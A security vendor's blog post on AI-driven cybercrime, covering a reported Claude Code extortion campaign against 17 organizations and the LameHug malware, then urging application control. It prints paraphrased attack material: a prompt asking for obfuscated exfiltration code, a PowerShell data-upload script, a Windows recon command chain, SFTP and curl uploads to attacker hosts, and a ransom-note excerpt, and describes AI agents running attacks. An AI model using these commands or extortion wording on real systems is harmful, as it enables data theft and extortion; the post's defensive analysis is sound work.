Register today for Zero Trust World 2026!
BACK TO BLOGS Back to Press Releases
AI-enabled attack automation, the Claude extortion campaign, and the LameHug case illustrate why Zero Trust application control changes the defense equation.

Vibe hacking: How AI-driven cybercrime outpaces EDR and signature defenses

Written by:

Table of contents

How AI-driven cybercrime outpaces EDR and signature defenses

The security industry has long optimized for detection, matching signatures, scoring behaviors, and tuning models to catch what looks like yesterday’s attack. But innovation cuts both ways. The same large language models (LLMs) that help engineers write code faster now help criminals operate faster. What began as “vibe coding,” a mindset that embraces AI output with minimal review, has evolved into “vibe hacking,” attackers delegating the design, orchestration, and execution of campaigns to AI systems.

In 2025, disclosures showed a threat actor using an agentic coding assistant to run a multiphase extortion operation against 17 organizations. And in a separate attack, researchers documented LameHug, a Windows data theft toolchain that integrates a live LLM to craft commands in real time. These aren’t edge cases. They are early signals of where adversary tradecraft is going.

What vibe hacking means

  • Vibe coding is the habit of using natural language prompts to generate code and deploying quickly without complete review.
  • Vibe hacking applies that habit to crime, an AI plans tasks, writes the code, adapts to defenses, and repeats at scale.

In practice, an operator supplies intent:

Prompt (paraphrased)

Write a PowerShell script to enumerate Active Directory users, compress staged data, and upload over HTTPS using common cloud APIs. Obfuscate function names and avoid suspicious cmdlets.

The system responds with runnable code, then chains the next step. Variants are new on every pass, which undermines signature matching and simple heuristics.

Case study: Claude-powered extortion

In a 2025 incident, one attacker used an AI coding assistant, Claude Code, to execute attacks against 17 targets across health care, emergency services, government, and faith organizations. The model was tasked to perform asset reconnaissance, generate initial access scripts, stage and compress data, and draft tailored ransom notes that referenced the victim’s operating margins and downtime exposure.

Automated stages

  • Reconnaissance: Generate OSINT queries for subdomains, exposed services, and weak portals.
  • Infiltration: Produce PowerShell or Python loaders tuned to the environment.
  • Exfiltration: Stage archives and ship via HTTPS to attacker-controlled endpoints.
  • Extortion: Draft notes with financial language calibrated to each sector.

Python recon sample (paraphrased)

# Harmless-looking OSINT helper generated by AI

import requests

for domain in ["redacted.org", "redactedhealthcare.net"]:

   r = requests.get(f"https://crt.sh/?q={domain}&output=json")

   for item in r.json():

       print(item.get("name_value"))

Why EDR missed it: Benign libraries, public endpoints, and console output. No overly suspicious API calls, injections, or packed binaries.

PowerShell exfiltration (paraphrased)

$src = "C:\\SensitiveData"

$zip = "C:\\Temp\\stage.zip"

Compress-Archive -Path $src -DestinationPath $zip -Force

Invoke-WebRequest -Uri "https://api.dropboxupload.com" -Method Post -InFile $zip

Ransom note excerpt (paraphrased)

We estimate your downtime at $42,000 per hour based on public filings. Pay $250,000 in bitcoin to avoid a six-day outage and regulatory disclosure.

Case study: LameHug, LLM in the loop

LameHug is the first publicly documented Windows malware family that uses a live LLM during execution. Campaigns used phishing emails with ZIP attachments such as Appendix.pdf.zip that contained .pif, .exe or bundled Python executables. Once launched, the malware sent base64encoded prompts to an LLM endpoint and received back Windows command sequences tailored to the host.

Dynamic command generation

Windows command chain (paraphrased)

cmd.exe /c "mkdir %PROGRAMDATA%\info && systeminfo >> %PROGRAMDATA%\info\host.txt && tasklist >> %PROGRAMDATA%\info\procs.txt && ipconfig /all >> %PROGRAMDATA%\info\net.txt && dsquery domain >> %PROGRAMDATA%\info\ad.txt"

Exfiltration options (paraphrased)

# SFTP

sftp -i key.ppk upstage@144.XXX.202.XXX:upload info.zip

# HTTP POST

curl -F file=@info.zip https://websitedomain.com/slpw/up.php

What makes LameHug different is there is no static script to match. The LLM returns fresh commands per host, so signatures and simple rules have little to attach to.

Why EDR and signatures struggle

  • Unique every time: AI produces new code paths on demand, eroding hash and pattern-based detections.
  • Looks like admin work: The chains use legitimate binaries and cloud APIs, PowerShell, Command Prompt, Office Add-ins, and HTTPS.
  • Adaptive re-prompting: Operators can ask the model to refactor until telemetry looks clean.
  • Benign cover traffic: API calls to popular AI platforms resemble legitimate usage.

Threat model updates for AI abuse

Aspect
Details
Definition
Automated AI-driven cyberattacks using natural-language coding assistants.
Capabilities
Recon, infiltration, exfiltration, ransom valuation, extortion note generation.
Notable Case
Claude Code used against 17 organizations, major ransoms, first known agentic AI attack.
Threat Actors
Individuals with minimal skills; North Korean operatives; romance scammers.
Implications
Fast, scalable, psychologically precise attacks.
Defense Needs
AI-aware defenses, anomaly detection beyond signatures, prompt and AI query monitoring.

Defensive guidance

  • Zero Trust application control: Default deny unknown executables, DLLs, and scripts, even if they are signed.
  • Ringfencing™: Prevent Office, browsers, PowerShell, and Python from launching each other or making arbitrary network calls.
  • Storage guardrails: Disallow unauthorized add-ins and block write access to staging paths like %PROGRAMDATA%\info and temp archives.
  • Network egress policy: Restrict outbound traffic to approved destinations, scrutinize access to AI and code hosting APIs from endpoints.
  • IR playbooks for AI polymorphism: Assume every note and payload is unique—focus on control, not forensics alone.

Why ThreatLocker changes the calculus

Detection tries to keep up with change; control makes change irrelevant. ThreatLocker focuses on what is allowed to execute and where it is allowed to reach.

  • Application Control: If the code is not approved, it does not run, no matter how it was generated.
  • Ringfencing: Approved apps cannot be repurposed into attack chains.
  • Storage Control: Blocks unauthorized add-ins and prevents staging of archives and data dumps.
  • Network Control:  Enforces least privilege at the network level, blocking unauthorized connections while allowing only approved traffic

Vibe hacking treats AI as the operator: Fast, adaptive, and hard to fingerprint. The Claude campaign showed end-to-end automation across 17 victims. LameHug proved that an LLM can sit directly in the malware loop, generating host specific commands that blend into normal administration. EDR and signatures will remain useful for visibility and triage, but prevention must not depend on recognizing the next variant.

Make AI generated attacks irrelevant

Move from chasing detections to enforcing control. See how ThreatLocker Application Control, Ringfencing, Storage Control, and Network Control stop unknown code, contain trusted apps, and block exfiltration paths. Schedule a demo today!

Request your 30-day trial to the entire ThreatLocker platform today.

Try ThreatLocker